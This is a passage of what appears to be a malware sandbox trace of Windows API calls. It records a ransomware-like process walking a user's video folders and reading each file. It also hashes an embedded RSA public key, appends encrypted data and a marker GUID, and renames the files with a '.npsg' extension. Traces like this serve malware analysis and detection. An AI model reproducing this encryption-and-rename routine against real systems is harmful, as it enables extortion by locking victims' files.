RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86a68 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86ab0 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88df0 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e08 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.532] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e08 | out: hHeap=0x620000) returned 1 [0239.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88e50 | out: hHeap=0x620000) returned 1 [0239.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88e50 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88e08 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88df0 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.534] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1fce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.534] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.534] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.534] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.534] CloseHandle (hObject=0x644) returned 1 [0239.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.542] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Qkx8qg7cJ_dn q5b5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\qkx8qg7cj_dn q5b5.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Qkx8qg7cJ_dn q5b5.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\qkx8qg7cj_dn q5b5.flv.npsg")) returned 1 [0239.544] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14d52ce0, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0x9c8f9630, ftLastAccessTime.dwHighDateTime=0x1d5c183, ftLastWriteTime.dwLowDateTime=0x9c8f9630, ftLastWriteTime.dwHighDateTime=0x1d5c183, nFileSizeHigh=0x0, nFileSizeLow=0xb6e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vfan_j aUPPyUrG.avi", cAlternateFileName="VFAN_J~1.AVI")) returned 1 [0239.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Vfan_j aUPPyUrG.avi") returned=".avi" [0239.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Vfan_j aUPPyUrG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\vfan_j auppyurg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.545] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=46820) returned 1 [0239.545] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.595] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb6be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.595] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.597] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xb6e4, lpOverlapped=0x0) returned 1 [0239.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.599] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.599] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.600] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.600] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.600] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.600] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.600] GetLastError () returned 0x0 [0239.600] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.600] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.600] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.600] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.600] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.601] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.602] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xb6e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.602] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.602] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.602] CloseHandle (hObject=0x644) returned 1 [0239.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.604] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Vfan_j aUPPyUrG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\vfan_j auppyurg.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\Vfan_j aUPPyUrG.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\vfan_j auppyurg.avi.npsg")) returned 1 [0239.606] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e75f20, ftCreationTime.dwHighDateTime=0x1d5bc2e, ftLastAccessTime.dwLowDateTime=0x7ed1200, ftLastAccessTime.dwHighDateTime=0x1d5bd78, ftLastWriteTime.dwLowDateTime=0x7ed1200, ftLastWriteTime.dwHighDateTime=0x1d5bd78, nFileSizeHigh=0x0, nFileSizeLow=0xf697, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YoimvJj7Uk63O5-D.swf", cAlternateFileName="YOIMVJ~1.SWF")) returned 1 [0239.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.606] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\YoimvJj7Uk63O5-D.swf") returned=".swf" [0239.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\YoimvJj7Uk63O5-D.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\yoimvjj7uk63o5-d.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.607] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=63127) returned 1 [0239.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.610] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf671, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.610] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.612] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.612] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf697, lpOverlapped=0x0) returned 1 [0239.613] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.613] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.613] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.613] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.614] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.614] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.614] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.614] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.614] GetLastError () returned 0x0 [0239.615] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.615] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.615] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.615] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.615] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf6a0) returned 0x3b95d50 [0239.615] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.616] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.616] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf697, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.616] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.617] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.617] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.617] CloseHandle (hObject=0x644) returned 1 [0239.618] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\YoimvJj7Uk63O5-D.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\yoimvjj7uk63o5-d.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\YoimvJj7Uk63O5-D.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\yoimvjj7uk63o5-d.swf.npsg")) returned 1 [0239.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.620] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.621] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e75f20, ftCreationTime.dwHighDateTime=0x1d5bc2e, ftLastAccessTime.dwLowDateTime=0x7ed1200, ftLastAccessTime.dwHighDateTime=0x1d5bd78, ftLastWriteTime.dwLowDateTime=0x7ed1200, ftLastWriteTime.dwHighDateTime=0x1d5bd78, nFileSizeHigh=0x0, nFileSizeLow=0xf697, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YoimvJj7Uk63O5-D.swf", cAlternateFileName="YOIMVJ~1.SWF")) returned 0 [0239.621] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.622] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.622] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\") returned="Y1FygDtm\\" [0239.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0239.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0239.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0239.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0239.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0239.622] PathFindFileNameW (pszPath="") returned="" [0239.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\Y1FygDtm\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee4bc10, ftCreationTime.dwHighDateTime=0x1d5b940, ftLastAccessTime.dwLowDateTime=0xe2bdff10, ftLastAccessTime.dwHighDateTime=0x1d5b5b8, ftLastWriteTime.dwLowDateTime=0xe2bdff10, ftLastWriteTime.dwHighDateTime=0x1d5b5b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0239.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ee4bc10, ftCreationTime.dwHighDateTime=0x1d5b940, ftLastAccessTime.dwLowDateTime=0xe2bdff10, ftLastAccessTime.dwHighDateTime=0x1d5b5b8, ftLastWriteTime.dwLowDateTime=0xe2bdff10, ftLastWriteTime.dwHighDateTime=0x1d5b5b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0239.623] FindNextFileW (in: 